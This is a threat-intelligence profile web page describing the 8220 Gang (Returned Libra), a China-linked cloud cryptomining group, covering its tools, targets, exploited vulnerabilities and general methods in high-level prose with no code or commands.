Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Threat Actors

8220 Gang (Returned Libra) – Threat Actor

February 26, 2024
Reading Time: 8 mins read
in Threat Actors
8220 Gang (Returned Libra) – Threat Actor

8220 Gang

Other Names

8220 Mining Group, Returned Libra

Location

China

Date of initial activity

2017

Suspected attribution

GitHub fork of the Rocke group's software

Motivation

Financial Gain

Associated tools

Tsunami malware, XMRIG cryptominer (PwnRig, DBUsed), masscan, spirit, PureCrypter MaaS

Overview

The 8220 Gang, also known as Returned Libra Mining Group, is a cloud threat actor group that has been active since at least 2017. The name derived from their use of port 8220 for command and control or C&C communications exchange. Tools commonly employed during their operations are PwnRig or DBUsed which are customized variants of the XMRig Monero mining software. The 8220 mining group is believed to have originated from a GitHub fork of the Rocke group’s software. 8220 Gang has elevated its mining operations with the use of cloud service platform credential scrapping.

Common targets

Victims of 8220 Gang are typically, but not exclusively, users of cloud networks (AWS, Azure, GCP, Aliyun, QCloud) operating vulnerable and misconfigured Linux applications and services. Victims are not targeted geographically but simply identified by their internet accessibility. The group appears to be opportunistic when selecting their targets, with no clear trend in country or industry.

Attack Vectors

The  group infects cloud hosts through known vulnerabilities and remote access brute forcing infection vectors.

How they operate

The 8220 Gang is an active threat group known for scanning and exploiting vulnerabilities in cloud and container environments. They specifically target applications such as Oracle WebLogic, Apache Log4j, Atlassian Confluence, and misconfigured Docker containers. Their objective is to exploit these vulnerabilities and deploy cryptocurrency mining software on compromised systems. To carry out their attacks, the gang uses various tools includingTsunami malware, XMRIG cryptominer, masscan, and spirit. These tools assist them in identifying and exploiting weaknesses in the targeted applications. Attacks make use of SSH brute forcing post-infection to automate local and global spreading attempts. Victims using cloud infrastructure (AWS, Azure, GCP, Aliyun, QCloud) are often infected via publicly accessible hosts running Docker, Confluence, Apache WebLogic, and Redis.  In their attack payload, the gang employs a PowerShell script that is responsible for downloading and creating additional files needed for the attack. As well as the recently disclosed use of CVE-2021-44228 and CVE-2017-3506, the group’s attempted exploitation of CVE-2020-14883, a Remote Code Execution vulnerability in Oracle WebLogic Server, to propagate malware. Surprisingly, despite its age, the vulnerability still exists in some systems, making it a valuable target for the gang. Their ultimate goal is to install and execute a cryptocurrency miner on the compromised systems. They achieve this by injecting an encrypted resource file into the MS Build process and communicating with their command-and-control (C&C) servers. The C&C servers provide instructions and deliver the necessary files for the cryptocurrency mining operation. References:
  • Connecting the dots between recently active cryptominers
  • 8220 Gang Deploys a New Campaign with Upgraded Techniques
  • From the Front Lines | 8220 Gang Massively Expands Cloud Botnet to 30,000 Infected Hosts
  • 8220 Gang Cloud Botnet Targets Misconfigured Cloud Workloads
  • Old Cyber Gang Uses New Crypter – ScrubCrypt
  • 8220 Gang Exploiting Vulnerabilities in Cloud Environments for Cryptocurrency Mining
  • 8220 Gang Evolves With New Strategies
  • Imperva Detects Undocumented 8220 Gang Activities
  • 8220 Gang Cryptomining Campaign Targets Linux & Windows Platforms
 
Tags: 8220 GangAttackersChinaCryptominingReturned LibraThreat Actors
ADVERTISEMENT

Related Posts

Storm-1811 (Cybercriminal) – Threat Actor

Storm-1811 (Cybercriminal) – Threat Actor

March 2, 2025
CopyCop (State-Sponsored) – Threat Actor

CopyCop (State-Sponsored) – Threat Actor

March 2, 2025
Storm-0539 – Threat Actor

Storm-0539 – Threat Actor

March 2, 2025
Void Manticore (Storm-0842) – Threat Actor

Void Manticore (Storm-0842) – Threat Actor

March 2, 2025
Unfading Sea Haze – Threat Actor

Unfading Sea Haze – Threat Actor

March 2, 2025
Ikaruz Red Team – Threat Actor

Ikaruz Red Team – Threat Actor

March 2, 2025

Latest Alerts

X Scam Targets Crypto Users with Fake Ads

FBI Warns Cybercriminals Exploit Routers

FreeDrain Phishing Steals Crypto Funds

CoGUI Targets Consumer and Finance Brands

COLDRIVER Hackers Target Sensitive Data

Cisco Fixes Flaw in IOS Wireless Controller

Subscribe to our newsletter

    Latest Incidents

    LockBit Ransomware Data Leaked After Hack

    Spanish Consumer Group Faces Cyberattack

    Education Giant Pearson Hit by Data Breach

    Masimo Cyberattack Disrupts Manufacturing

    Cyberattack Targets Tepotzotlán Facebook

    West Lothian Schools Hit by Ransomware

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial